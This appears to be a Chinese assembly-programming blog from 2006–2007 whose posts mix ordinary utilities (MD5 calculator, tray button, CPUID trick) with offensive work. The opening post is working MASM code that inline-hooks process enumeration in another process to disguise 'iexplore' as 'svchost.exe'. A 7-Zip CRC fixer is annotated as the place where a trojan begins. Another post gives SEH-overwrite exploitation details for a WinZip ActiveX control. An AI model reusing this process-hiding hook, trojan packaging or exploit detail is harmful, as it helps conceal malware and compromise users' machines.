        add esi,[esi].e_lfanew
  mov edi,esi
  assume edi:ptr IMAGE_NT_HEADERS

;********************************************************************
; 循环显示每个节区的信息
;********************************************************************
  movzx ecx,[edi].FileHeader.NumberOfSections
  add edi,sizeof IMAGE_NT_HEADERS
  assume edi:ptr IMAGE_SECTION_HEADER
  .repeat
   push ecx
;********************************************************************
; 节区名称
;********************************************************************
   invoke RtlZeroMemory,addr @szSectionName,sizeof @szSectionName
   push esi
   push edi
   mov ecx,8
   mov esi,edi
   lea edi,@szSectionName
   cld
   @@:
   lodsb
   .if ! al
    mov al,' '
   .endif
   stosb
   loop @B
   pop edi
   pop esi
;********************************************************************
            invoke lstrcmpi,offset sztext,addr @szSectionName
            .if eax == 0
      push [edi].VirtualAddress
      pop eax
      ret
   .else
   add edi,sizeof IMAGE_SECTION_HEADER
   .endif
;********************************************************************
   pop ecx
  .untilcxz
  assume edi:nothing
  ret

_ProcessPeFile endp

;得到相应进程的模块加载的起始地址
GetShell32Base proc uses ebx esi edi remoteproid
            LOCAL hSnapshot:dword
            LOCAL modinfo:MODULEENTRY32
            LOCAL modname[256]:byte

        mov     modinfo.dwSize,sizeof MODULEENTRY32
        invoke CreateToolhelp32Snapshot,TH32CS_SNAPMODULE,remoteproid
        mov     hSnapshot,eax
        invoke Module32First,hSnapshot,addr modinfo
        .while eax
        lea     ecx,modinfo.szModule
        invoke lstrcmpi,offset kernel32,ecx
        .if     eax == 0
                mov eax,modinfo.modBaseAddr
                ret
        .endif
        invoke Module32Next,hSnapshot,addr modinfo
        .endw
        invoke CloseHandle,hSnapshot

                ret
GetShell32Base   endp

InlineHook proc
    LOCAL   hProcess:dword
    LOCAL   hKernel32:dword
    LOCAL   hAPI:dword
    LOCAL   PID:dword
    LOCAL   ModBase:dword
    LOCAL   OLDpro:dword
    LOCAL   CodeBuf[128]:byte
    LOCAL   optable[2048]:byte
    LOCAL   codelen:dword
    LOCAL   APIoffset:dword
    LOCAL   hAPI2:dword
    LOCAL   pHookFun:dword
    LOCAL   hooklen1:dword
    LOCAL   hookfunlen:dword

    lea eax,optable
    push eax
    call disasm_init ;解压缩'指令长度表'

    invoke LoadLibrary,offset kernel32   ;得到自身进程DLL的基地址
    mov     hKernel32,eax
    invoke _ProcessPeFile,hKernel32      ;通过分析PE文件得到相应的.text节的虚拟偏移
    mov     VirtualAddress,eax           ;一般为1000h
    invoke GetProcAddress,hKernel32,offset P32First ;得到API的入口地址
    mov     hAPI,eax
    mov     eax,hKernel32
    add     eax,VirtualAddress           ;得到代码节起始地址
    mov     ecx,hAPI
    sub     ecx,eax                      ;函数入口相对于代码节的偏移
    mov     APIoffset,ecx
    invoke GetCurrentProcessId
    mov     PID,eax
    mov     eax,9504
    mov     PID,eax
    invoke GetShell32Base,eax
    mov     ModBase,eax                  ;得到目标进程DLL的基地址
    add     eax,VirtualAddress           ;得到目标进程DLL的代码节基地址
    add     eax,APIoffset                ;得到目标进程被HOOK的函数的入口地址
    mov     hAPI2,eax
    invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,PID
    mov     hProcess,eax
    invoke ReadProcessMemory,hProcess,hAPI2,addr CodeBuf,128,0
    lea     esi,CodeBuf
    xor     edi,edi

@@nextcode:
    push esi
    lea eax,optable
    push eax
    call disasm_main
    .if eax !=-1
        add edi,eax
        .if edi>=5
        mov codelen,edi   ;codelne记录应该COPY的代码字节数
        jmp @@findok
        .else
        add esi,eax
        jmp @@nextcode
        .endif
    .else
    xor eax,eax
    ret
    .endif
@@findok:

;写HOOK函数到目标进程DLL的空闲空间中
    mov     eax,ModBase
    add     eax,VirtualAddress
    sub     eax,512
    mov     pHookFun,eax
    invoke VirtualProtectEx,hProcess,pHookFun,512,PAGE_EXECUTE_READWRITE,addr OLDpro

    ;计算偏移
    mov     ecx,@@hookbeg
    mov     eax,@@fakeret
    sub     eax,ecx
    mov     hooklen1,eax
    ;计算HOOK函数的全部代码长度
    mov     ecx,@@hookbeg
    mov     eax,@@hookfunend
    sub     eax,ecx
    mov     hookfunlen,eax
    ;把HOOK函数从代码段移到变量中
    mov     eax,@@hookbeg
    invoke RtlMoveMemory,offset HookFunBuf,eax,hookfunlen
    ;把HOOK函数从变量中移到目标进程的内存中,这儿只移开头的一部分
    invoke WriteProcessMemory,hProcess,pHookFun,offset HookFunBuf,hooklen1,0
    ;移动被覆盖的原函数代码到目标内存中
    mov     ecx,pHookFun
    add     ecx,hooklen1
    sub     ecx,21
    invoke WriteProcessMemory,hProcess,ecx,addr CodeBuf,codelen,0
    ;跳回原函数
    mov     ecx,pHookFun
    add     ecx,hooklen1
    mov     edx,ecx
    sub     ecx,5         ;JMP指令的起始地址
    mov     eax,hAPI2
    sub     eax,edx
    add     eax,codelen
    mov     edx,offset JMPCODE2
    inc     edx
    mov     [edx],eax
    invoke WriteProcessMemory,hProcess,ecx,offset JMPCODE2,5,0
    ;移动真正的HOOK功能代码到目标内存中
    mov     ecx,pHookFun
    add     ecx,hooklen1
    mov     eax,offset HookFunBuf
    add     eax,hooklen1
    mov     edx,hookfunlen
    sub     edx,hooklen1
    invoke WriteProcessMemory,hProcess,ecx,eax,edx,0

    ;设置跳转指令
    mov     eax,pHookFun
    sub     eax,hAPI2
    sub     eax,5
    mov     ecx,offset JMPCODE
    inc     ecx
    mov     [ecx],eax

    invoke VirtualProtectEx,hProcess,hAPI2,codelen,PAGE_READWRITE,addr OLDpro
    invoke WriteProcessMemory,hProcess,hAPI2,offset JMPCODE,5,0
    invoke VirtualProtectEx,hProcess,hAPI2,codelen,OLDpro,addr OLDpro
    invoke CloseHandle,hProcess

    invoke MessageBox,0,offset inline,offset inline,1

            ret
InlineHook endp

@@hookbeg:
push [esp+8] ;ARG2 有几个参数就ESP加几
push [esp+8] ;ARG1
jmp @@fakeret
@@setret:
somenop1 db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h ;这儿填被JMP覆盖的指令
somenop2 db 90h,90h,90h,90h,90h           ;填跳回原函数的JMP指令
@@fakeret:
call @@setret
;检查原函数的参数,判断是否改变原函数的执行结果,这时EAX为函数返回值注意保存
sub esp,8
pushad
mov edx,[esp+4+32];原函数倒数第2个参数,进程信息结构的地址
.if eax != ERROR_NO_MORE_FILES
    add edx,36
    mov eax,[edx]
    mov ecx,[edx+4]
    .if (eax == 'pxei')&&( ecx == 'erol') ;把iexplorer换为svchost.exe
        mov eax,'hcvs'
        mov [edx],eax
        mov eax,'.tso'
        mov [edx+4],eax
        mov eax,' exe'
        mov [edx+8],eax
    .endif
.endif
popad
add esp,8
;跳回正常的返回地址
ret 8   ;参数个数*4
@@hookfunend:

start:
    invoke MessageBoxA,0,offset inline,offset inline,1
    invoke InlineHook
    invoke ExitProcess,0

include \masm32\include\lde32bin.inc

end start

指令技巧

czy82 — Tue, 23 Jan 2007 01:06:00 GMT

;哈哈看看会显示什么?我机器上显示的是Gennet,情报网?

.586
.model flat, stdcall
option casemap:none

include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.code
start:
CPUID
push   ax
inc    esp
push   cx
inc    esp
push   bx
inc    esp
push   dx
inc    esp
push   dx
inc    esp
push   bx
push   esp
pop    ecx
dec    esp
invoke MessageBox,50h,ecx,ecx,50h
add    esp,8
ret
end start

上面的代码反汇编出来看看,呵呵差点全字母:)

0fh,a2h,fPDfQDfSDfRDfRDfSTYLjPQQjP,e8h,05h,00h,00h,00h,83h,c4h,08h,c3h

得到另外一个线程的TEB地址

czy82 — Wed, 10 Jan 2007 03:23:00 GMT

;--------------根据窗口所在的线程得到该线程的TEB地址
     invoke OpenThread,THREAD_QUERY_INFORMATION,FALSE,WINTHREADID
     .if eax != NULL
             mov     THREADHAND,EAX
          invoke LoadLibrary,offset Ntdll
             invoke GetProcAddress,eax,offset _ZwQueryInformationThread
             mov     apiquerthread,eax
             push    0
             push    sizeof THREAD_BASIC_INFORMATION
             lea     ecx,threadinfo
             push    ecx
             push    ThreadBasicInformation
             push    THREADHAND
             call    apiquerthread
             .IF EAX == STATUS_SUCCESS
                 lea ecx,threadinfo
                 mov esi,[ecx+4] ;得到TEB了

             .ELSE
                 invoke MessageBox,0,offset errgetteb,offset vp,1
                 ret
                .ENDIF
        .else
            invoke MessageBox,0,offset erropenthread,offset vp,1
            ret
        .endif

comment %

;以前的办法目标进程线程太多就不行了.

;fs:18的值是TEB的基址,FS:24线程ID,根据这两个来判断
        mov esi,07ffd0000h
@@nextteb:
        invoke Toolhelp32ReadProcessMemory,parid,esi,offset buffer1,4,NULL
        .if eax == TRUE
            mov ecx,esi
            add ecx,18h
            invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
            .if eax == TRUE
                mov eax,offset buffer1
                mov eax,[eax]
                .if eax == esi
                    mov ecx,esi
                    add ecx,24h
                    invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
                    .if eax == TRUE
                        mov eax,offset buffer1
                        mov eax,[eax]
                        .if eax == WINTHREADID
                        jmp @@getteb
                        .else
                        jmp @@next
                        .endif
                    .else
                    jmp @@next
                    .endif
                .else
                    jmp @@next
                .endif
            .else
                jmp     @@next
            .endif
        .elseif esi>07ffdf000h
            ret
        .else
@@next:
        add esi,1000h
        jmp @@nextteb
        .endif
@@getteb:

%
invoke wsprintf,offset bufferteb,offset tebformat,esi
invoke MessageBox,0,offset bufferteb,offset vp,1

MAKE 7ZIP CRC32

czy82 — Sat, 06 Jan 2007 02:46:00 GMT

;***********************************************************************************************
;MAKE 7ZIP CRC32
;***********************************************************************************************

.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc

include \masm32\include\user32.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

WndProc proto :DWORD, :DWORD, :DWORD, :DWORD
init_crc32table proto
arraycrc32 proto

.const
IDC_BUTTON_OPEN equ 3000
IDC_EDIT_INPUT equ 3001

.data
szDlgName  db "7zCRC32_dialog", 0
szTitle   db "7zCRC32", 0
szTemplate  db "字符串 ""%s"" 的 CRC32 值是：%X", 0
crc32tbl     dd 256 dup(0) ;CRC-32 table
szBuffer2  db 'C:\b.rar',0
pochand         dd 0
readsize        dd 0
crc1size        dd 0

.data?
szText db 300 dup(?)
szBuffer db 32768 dup(?)

.code
main:
invoke GetModuleHandle, NULL
invoke DialogBoxParam, eax, offset szDlgName, 0, WndProc, 0
invoke ExitProcess, eax

WndProc proc uses ebx hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM

.if uMsg == WM_CLOSE
  invoke EndDialog, hWnd, 0

.elseif uMsg == WM_COMMAND
  mov eax,wParam
  mov edx,eax
  shr edx,16
  movzx eax, ax
  .if edx == BN_CLICKED
   .IF eax == IDCANCEL
    invoke EndDialog, hWnd, NULL
   .ELSEIF eax == IDC_BUTTON_OPEN || eax == IDOK
    ;******************************************
    ;关键代码开始：（当当当当……）
    ;******************************************
    ;得到文件路径
    ;invoke GetDlgItemText, hWnd, IDC_EDIT_INPUT, addr szBuffer2, 255
;---打开文件读内容到szBuffer
                invoke CreateFileA,offset szBuffer2,GENERIC_READ,FILE_SHARE_READ,\
               NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
          mov pochand,eax
          invoke GetFileSize,eax,NULL
          sub    eax,32d
          mov    crc1size,eax
          ;invoke SetFilePointer,pochand,12d,NULL,FILE_BEGIN ;木马开始
          ;invoke _lread,pochand,offset szBuffer,20d
          invoke SetFilePointer,pochand,32d,NULL,FILE_BEGIN ;木马开始
          invoke _lread,pochand,offset szBuffer,crc1size
          invoke CloseHandle,pochand


comment %
看到了吧这个是7Z文件的头部有两个地方有CRC32效验.
第一个地方:整个文件的偏移12d开始,长度20d
第二个地方:整个文件的偏移32d开始,长度是NextHeaderSize
SignatureHeader
~~~~~~~~~~~~~~~
BYTE kSignature[6] = {'7', 'z', 0xBC, 0xAF, 0x27, 0x1C};

ArchiveVersion
{
BYTE Major; // now = 0
BYTE Minor; // now = 2
};

UINT32 StartHeaderCRC;

StartHeader
{
    REAL_UINT64 NextHeaderOffset
    REAL_UINT64 NextHeaderSize
    UINT32 NextHeaderCRC
}
%
;---

;初始化crc32table：
invoke init_crc32table

    ;下面赋值给寄存器ebx，以便进行crc32转换：
    ;EBX是待转换的字符串的首地址：
    lea ebx, szBuffer
    mov ecx,crc1size ;20d ;长度!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!重要

    ;进行crc32转换：
    invoke arraycrc32
    mov ecx,offset szBuffer
    mov [ecx],eax

;格式化输出：
;invoke wsprintf, addr szText, addr szTemplate, addr szBuffer2, eax

    ;好啦，让我们显示结果：
    ;invoke MessageBox, hWnd, addr szText, addr szTitle, MB_OK
;----------写第二个CRC
                invoke CreateFileA,offset szBuffer2,GENERIC_WRITE,FILE_SHARE_WRITE,\
               NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
          mov pochand,eax
          invoke SetFilePointer,pochand,28d,NULL,FILE_BEGIN ;木马开始
          invoke _lwrite,pochand,offset szBuffer,4
          invoke CloseHandle,pochand
;---------

;下面开始写第一个CRC
                invoke CreateFileA,offset szBuffer2,GENERIC_READ,FILE_SHARE_READ,\
               NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
          mov pochand,eax
          invoke SetFilePointer,pochand,12d,NULL,FILE_BEGIN ;木马开始
          invoke _lread,pochand,offset szBuffer,20d
          invoke CloseHandle,pochand
          ;初始化crc32table：
    invoke init_crc32table

    ;下面赋值给寄存器ebx，以便进行crc32转换：
    ;EBX是待转换的字符串的首地址：
    lea ebx, szBuffer
    mov ecx,20d ;20d ;长度!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!重要

    ;进行crc32转换：
    invoke arraycrc32
    mov ecx,offset szBuffer
    mov [ecx],eax

;格式化输出：
;invoke wsprintf, addr szText, addr szTemplate, addr szBuffer2, eax

    ;好啦，让我们显示结果：
    ;invoke MessageBox, hWnd, addr szText, addr szTitle, MB_OK
;----------写第二个CRC
                invoke CreateFileA,offset szBuffer2,GENERIC_WRITE,FILE_SHARE_WRITE,\
               NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
          mov pochand,eax
          invoke SetFilePointer,pochand,8d,NULL,FILE_BEGIN ;木马开始
          invoke _lwrite,pochand,offset szBuffer,4
          invoke CloseHandle,pochand
;---------

   .ENDIF
  .endif
.ELSE
  mov eax,FALSE
  ret
.ENDIF
mov eax,TRUE
ret
WndProc endp

;**********************************************************
;函数功能：生成CRC-32表
;**********************************************************
init_crc32table proc

  ;如果用C语言来表示，应该如下：
        ;
        ; for (i = 0; i < 256; i++)
  ; {
        ;  crc = i;
        ;  for (j = 0; j < 8; j++)
  ;  {
        ;   if (crc & 1)
        ;    crc = (crc >> 1) ^ 0xEDB88320;
        ;   else
        ;    crc >>= 1;
  ;  }
        ;  crc32tbl[i] = crc;
        ; }
        ;
  ;呵呵，让我们把上面的语句改成assembly的：

        mov     ecx, 256        ; repeat for every DWORD in table
        mov     edx, 0EDB88320h
$BigLoop:
        lea     eax, [ecx-1]
        push    ecx
        mov     ecx, 8
$SmallLoop:
        shr     eax, 1
        jnc     @F
        xor     eax, edx
@@:
        dec  ecx
        jne  $SmallLoop
        pop     ecx
        mov     [crc32tbl+ecx*4-4], eax
        dec  ecx
        jne  $BigLoop

ret
init_crc32table endp

;**************************************************************
;函数功能：计算CRC-32
;**************************************************************
arraycrc32 proc uses ebx

  ;计算 CRC-32 ，我采用的是把整个字符串当作一个数组，然后把这个数组的首地址赋值给 EBX，
  ;把数组的长度赋值给 ECX，然后循环计算，返回值（计算出来的 CRC-32 值）储存在 EAX 中：
  ;
        ; 参数：
        ;       EBX = address of first byte
  ;  ECX = number of bytes in array
        ; 返回值：
        ;       EAX = CRC-32 of the entire array

        mov     eax, -1 ; 先初始化eax
  or   ecx, ecx
  jz  $Done ;如果表为空，就bye bye
        or      ebx, ebx
        jz      $Done   ; 避免出现空指针
@@:
        mov     dl, [ebx]

   ;这里我用查表法来计算 CRC-32 ，因此非常快速：
        ;因为这是assembly代码，所以不需要给这个过程传递参数，只需要把oldcrc赋值给EAX，以及把byte赋值给DL：
  ;
        ; 在C语言中的形式：
        ;
        ;   temp = (oldcrc ^ abyte) & 0x000000FF;
        ;   crc = (( oldcrc >> 8) & 0x00FFFFFF) ^ crc32tbl[temp];
        ;
        ; 参数：
        ;       EAX = old CRC-32
        ;        DL = a byte
        ; 返回值：
        ;       EAX = new CRC-32
        ;       EDX = ?

        xor     dl, al
        movzx   edx, dl
        shr     eax, 8
        xor     eax, [crc32tbl+edx*4]

        inc     ebx
  dec  ecx
  jne  @B

not eax

$Done:
ret
arraycrc32 endp

end main
;*************************** over ***************************************
;by LC && czy

PDF的洞洞

czy82 — Thu, 23 Nov 2006 19:52:00 GMT

发现PDF的洞和RAR的一样随便啥后缀都行,程序只认文件格式,爽呀.

md5计算器

czy82 — Fri, 17 Nov 2006 16:27:00 GMT

网上有些MD5_CTX结构的定义应该是有问题的.

/* Data structure for MD5 (Message-Digest) computation */
typedef struct {
    ULONG i[2]; /* number of _bits_ handled mod 2^64 */
    ULONG buf[4]; /* scratch buffer */
    unsigned char in[64]; /* input buffer */
    unsigned char digest[16]; /* actual digest after MD5Final call */
} MD5_CTX;

有些又是:

typedef struct {
UINT4 state[4];
UINT4 count[2];
unsigned char buffer[64];
} MD5_CTX;

;md5 hash calc
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\comdlg32.inc
include \masm32\include\masm32.inc
include \masm32\include\gdi32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib

WndProc proto :DWORD, :DWORD, :DWORD, :DWORD

.const
IDI_SM           equ 1 ;图标
IDC_EDIT_TEXT           equ 1001
IDC_EDIT_128            equ 1002
IDC_EDIT_CHG            equ 1003
IDC_BUTTON_OK           equ 1004
IDC_OUTTYPE             equ 1005
IDC_OUTTYPE2            equ 1006

RGB MACRO red, green, blue
xor eax, eax
mov al, blue    ; blue
rol eax, 8
mov al, green   ; green
rol eax, 8
mov al, red     ; red
ENDM

MD5_CTX struct
state dd 2 dup (?)
count dd 4 dup (?)
digest dw 16 dup (?)
buffer dw 64 dup (?)

MD5_CTX ends

.data
szDlgName   db "md5hash_dialog", 0
hInstance   dd ?
advdll              db "advapi32.dll",0
md5init             db 'MD5Init',0
md5update           db 'MD5Update',0
md5final            db 'MD5Final',0
format              db '%02X',0
format2             db '%02x',0
outtype             dd 1
.data?
string              db 256 dup(?)
contex              MD5_CTX <>
buffer              db 64 dup (?)
tempbuffer          db 64 dup (?)
.code
start:
invoke GetModuleHandle, NULL
mov hInstance, eax
invoke DialogBoxParam, hInstance, offset szDlgName, 0, WndProc, 0
invoke ExitProcess, eax

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
local hBrush :dword
local rect:RECT
local LogBrush:LOGBRUSH

.if uMsg == WM_CLOSE
invoke EndDialog, hWnd, 0

.elseif uMsg == WM_INITDIALOG
  invoke LoadIcon, hInstance, IDI_SM
  invoke SendMessage, hWnd, WM_SETICON, ICON_SMALL, eax
  invoke CheckDlgButton,hWnd,IDC_OUTTYPE,BST_CHECKED ;默认大写方式输出HASH
.elseif uMsg == WM_CTLCOLORSTATIC
  RGB 180,100,100
  invoke SetBkColor,wParam,eax
  invoke GetStockObject,HOLLOW_BRUSH
  ret
.elseif uMsg == WM_ERASEBKGND
  mov LogBrush.lbStyle,BS_SOLID
  RGB 180,100,100
  mov LogBrush.lbColor,eax
  invoke CreateBrushIndirect,addr LogBrush
  mov hBrush,eax
  invoke GetClientRect,hWnd,addr rect
  invoke FillRect,wParam,addr rect,hBrush
  mov eax,TRUE
  ret
.elseif uMsg == WM_COMMAND
  mov eax, wParam
  mov edx, eax
  shr edx, 16
  movzx eax, ax
  .if edx == BN_CLICKED ;处理按键消息
   .if eax == IDC_BUTTON_OK ;生成
    invoke GetDlgItemText, hWnd, IDC_EDIT_TEXT, offset string,255
                invoke LoadLibrary,offset advdll
                mov edi,eax
                invoke GetProcAddress,edi,offset md5init
    mov esi,eax
    push offset contex
    call esi

                invoke GetProcAddress,edi,offset md5update
                mov esi,eax

                invoke lstrlen,offset string
                push eax
                push offset string
                push offset contex
                call esi

                invoke GetProcAddress,edi,offset md5final
                mov esi,eax
                push offset contex
                call esi
                mov esi,offset contex
                add esi,88d
                xor ebx,ebx
                .while ebx<16
                xor eax,eax
                movzx ax,byte ptr [esi]
                .if outtype == 1
                invoke wsprintf,offset buffer,offset format,ax ;大写
                .else
                invoke wsprintf,offset buffer,offset format2,ax ;小写
                .endif

                invoke lstrcat,offset tempbuffer,offset buffer
                inc esi
                inc ebx
                .endw

                invoke SetDlgItemText, hWnd, IDC_EDIT_128, offset tempbuffer
                mov esi,offset tempbuffer
                add esi,8
                mov edi,esi
                add edi,16
                xor eax,eax
                mov [edi],eax
       invoke SetDlgItemText, hWnd, IDC_EDIT_CHG,esi

       invoke RtlZeroMemory,offset tempbuffer,64
            .elseif eax == IDC_OUTTYPE
                mov outtype,1
            .elseif eax == IDC_OUTTYPE2
                mov outtype,0
   .endif
  .endif ;end of bn_clicked

.else
mov eax, FALSE
ret
.endif
mov eax, TRUE
ret
WndProc endp

end start

标题栏添加最小化到托盘按钮

czy82 — Fri, 17 Nov 2006 16:01:00 GMT

主要难度还是处理一些不常用的非客户区消息:)

不过真的要写完美我想应该要判断系统中窗口的风格,我这儿只是经典风格,如果是XP风格就难看咯.

TIP控件:

        invoke CreateWindowEx,NULL,offset ToolTipClass,NULL,WS_POPUP or TTS_NOPREFIX or TTS_ALWAYSTIP\
                or WS_EX_TOOLWINDOW or WS_EX_TOPMOST,CW_USEDEFAULT, CW_USEDEFAULT,CW_USEDEFAULT, CW_USEDEFAULT,\
                            hWnd, NULL, hInstance,NULL
        mov hToolTip,eax
     mov ti.cbSize,sizeof TOOLINFO
  mov ti.uFlags,TTF_IDISHWND
  push hWinMain
  pop ti.hWnd
  push hWinMain
  pop ti.uId
     mov ti.lpszText,LPSTR_TEXTCALLBACK
     invoke SendMessage,hToolTip,TTM_ADDTOOL,0,addr ti
        invoke SendMessage,hToolTip,TTM_ACTIVATE,1,0
        ;%
        ;加载最小化到托盘的标题栏图标
  INVOKE ImageList_Create, 16, 14, ILC_COLOR32 , 2, 0
        mov hImageListTitle, eax
      INVOKE LoadBitmap, hInstance, IDB_TITLEBUTTONBMP
        mov hBitmap, eax
      INVOKE ImageList_Add, hImageListTitle, hBitmap, NULL
      INVOKE DeleteObject, hBitmap
      ;托盘右键菜单
  invoke CreatePopupMenu
  mov hTrayMenu,eax
  invoke AppendMenu,hTrayMenu,MF_STRING,IDM_EXITSERVER,offset exitserver
  invoke AppendMenu,hTrayMenu,MF_STRING,IDM_RESTOREWIN,offset restorewin

通知消息部分:

    mov edi,lParam
    assume edi:ptr NMHDR
    .if [edi].code == TTN_GETDISPINFO
            mov eax,[edi].hwndFrom
            .if eax == hToolTip
                mov edi,lParam
       assume edi:ptr TOOLTIPTEXT
       mov eax,offset sztraytip
       mov [edi].lpszText,eax
       mov [edi].uFlags,TTF_IDISHWND
       assume edi:nothing
   .else
       ..........some other code...
   .endif
    .endif

WM消息部分:

    .elseif uMsg==WM_SHELLNOTIFY
   .if lParam==WM_RBUTTONUP
    invoke GetCursorPos,addr Pt
    invoke SetForegroundWindow,hWnd
    invoke TrackPopupMenu,hTrayMenu,TPM_RIGHTALIGN,Pt.x,Pt.y,NULL,hWnd,NULL
    invoke PostMessage,hWnd, WM_USER, 0, 0
   .elseif lParam==WM_LBUTTONDOWN

    invoke ShowWindow,hWnd,SW_RESTORE
    invoke Shell_NotifyIcon,NIM_DELETE,addr note
    invoke SetForegroundWindow,hWnd
    invoke SendMessage,hWnd,WM_NCPAINT,0,0
   .endif
    .elseif uMsg==WM_ACTIVATE
        invoke SendMessage,hWnd,WM_NCPAINT,0,0
    .elseif uMsg==WM_NCPAINT
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        invoke GetWindowDC,hWnd
        mov esi,eax
        invoke GetWindowRect,hWnd,addr rc
        mov edx,rc.left
        mov edi,rc.right
        sub edi,edx
        sub edi,90;72
        invoke ImageList_GetIcon,hImageListTitle,0,ILD_NORMAL
        invoke DrawIconEx,esi,edi,6,eax,16,14,NULL,NULL,DI_IMAGE ;画小图标
        invoke ReleaseDC,hWnd,esi
    .elseif uMsg==WM_NCLBUTTONDOWN
        invoke GetCursorPos,addr Pt
        invoke GetWindowRect,hWnd,addr rc
        mov edx,rc.left
        mov edi,rc.top
        mov eax,Pt.x
        sub eax,edx
        mov ecx,Pt.y
        sub ecx,edi
        mov esi,rc.right
        sub esi,edx
        sub esi,90;72
        mov edi,esi
        add edi,16
        .if eax >= esi && ecx >= 6 && eax <= edi && ecx <= 20
        invoke GetWindowDC,hWnd
        mov edi,eax
        invoke ImageList_GetIcon,hImageListTitle,1,ILD_NORMAL
        invoke DrawIconEx,edi,esi,6,eax,16,14,NULL,NULL,DI_IMAGE ;画按下图标
        invoke ReleaseDC,hWnd,edi
        mov clickmytitle,1

        .else
        mov clickmytitle,0
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        .endif
        invoke SendMessage,hToolTip,TTM_POP,0,0
    .elseif uMsg==WM_NCMOUSEMOVE
        invoke GetCursorPos,addr Pt
        invoke GetWindowRect,hWnd,addr rc
        mov edx,rc.left
        mov edi,rc.top
        mov eax,Pt.x
        sub eax,edx
        mov ecx,Pt.y
        sub ecx,edi
        mov esi,rc.right
        sub esi,edx
        sub esi,90;72
        mov edi,esi
        add edi,16
        .if eax >= esi && ecx >= 6 && eax <= edi && ecx <= 20
            .if clickmytitle == 1
                invoke GetWindowDC,hWnd
                mov edi,eax
                invoke ImageList_GetIcon,hImageListTitle,1,ILD_NORMAL
                invoke DrawIconEx,edi,esi,6,eax,16,14,NULL,NULL,DI_IMAGE ;画小图标
                invoke ReleaseDC,hWnd,edi
            .endif
;;--------
        push hWnd
        pop msg.hwnd
  mov msg.message,WM_MOUSEMOVE;
  ;mov msg.lParam,MAKELONG(Pt.x, Pt.y);
  ;lea eax,msg.lParam
  ;assume eax:ptr POINT
  ;mov ecx,Pt.x
  ;mov [eax].x,ecx
  ;mov ecx,Pt.y
  ;mov [eax].y,ecx
  ;assume eax:nothing
        invoke SendMessage,hToolTip,TTM_RELAYEVENT,0,addr msg
;;--------
        .else
        invoke GetWindowDC,hWnd
        mov edi,eax
        invoke ImageList_GetIcon,hImageListTitle,0,ILD_NORMAL
        invoke DrawIconEx,edi,esi,6,eax,16,14,NULL,NULL,DI_IMAGE ;画小图标
        invoke ReleaseDC,hWnd,edi
        invoke SendMessage,hToolTip,TTM_POP,0,0
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        ;mov clickmytitle,0
        .endif
    .elseif uMsg==WM_NCLBUTTONUP
        invoke GetCursorPos,addr Pt
        invoke GetWindowRect,hWnd,addr rc
        mov edx,rc.left
        mov edi,rc.top
        mov eax,Pt.x
        sub eax,edx
        mov ecx,Pt.y
        sub ecx,edi
        mov esi,rc.right
        sub esi,edx
        sub esi,90;72
        mov edi,esi
        add edi,16
        .if eax >= esi && ecx >= 6 && eax <= edi && ecx <= 20
         .if clickmytitle ==1
;;--------
  mov note.cbSize,sizeof NOTIFYICONDATA
  push hWnd
  pop note.hwnd
  mov note.uID,0
  mov note.uFlags,NIF_ICON+NIF_MESSAGE+NIF_TIP
  mov note.uCallbackMessage,WM_SHELLNOTIFY
  invoke LoadIcon,hInstance,IDI_LINKSERVER;IDI_WINLOGO
  mov note.hIcon,eax
  invoke lstrcpy,addr note.szTip,addr AppName

  invoke Shell_NotifyIcon,NIM_ADD,addr note
  invoke ShowWindow,hWnd,SW_HIDE
;;--------
            mov clickmytitle,0
         .endif
        .else
        invoke GetWindowDC,hWnd
        mov edi,eax
        invoke ImageList_GetIcon,hImageListTitle,0,ILD_NORMAL
        invoke DrawIconEx,edi,esi,6,eax,16,14,NULL,NULL,DI_IMAGE ;画小图标
        invoke ReleaseDC,hWnd,edi
        mov clickmytitle,0
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam
        .endif

WINZIP出漏洞咯

czy82 — Fri, 17 Nov 2006 06:57:00 GMT

随WINZIP10安装的那个WZFILEVIEW.FileViewCtrl.61控件的漏洞其实非常简单

覆盖SEH链中的第二个就可以了.不过实际利用中遇到几个怪问题:

1.一般的EB069090得改成0B,为什么哩,跳转地址后头不知道从哪儿多了四个FF,06+04=0AH的但是哩在网页代码头0A又是回车.所以只有改成0B,要不改成9090EB08:)不过还是搞不懂FF哪儿来的.

2.简中下测试,我发现超长串要经过widechartomulitbyte处理,这样的话eb0b9090和7ffa1571都会被转化.

想了半天想不出不让它转化的办法唉.不过英文2KSP4下测试成功率到还可以.

破解扫雷

czy82 — Fri, 20 Oct 2006 01:53:00 GMT

:0100212D 8B0D18510001            mov ecx, dword ptr [01005118] ;列
:01002133 8BF0                    mov esi, eax
:01002135 A11C510001              mov eax, dword ptr [0100511C] ;行
:0100213A C1E005                  shl eax, 05 ;乘32(2的5次方)
:0100213D 8A840840530001          mov al, byte ptr [eax+ecx+01005340] ;01005340是静态数据区中记录雷区表的起始地址
;如果AL为8F说明有雷,AL为0F说明没有雷
:01002144 2480                    and al, 80
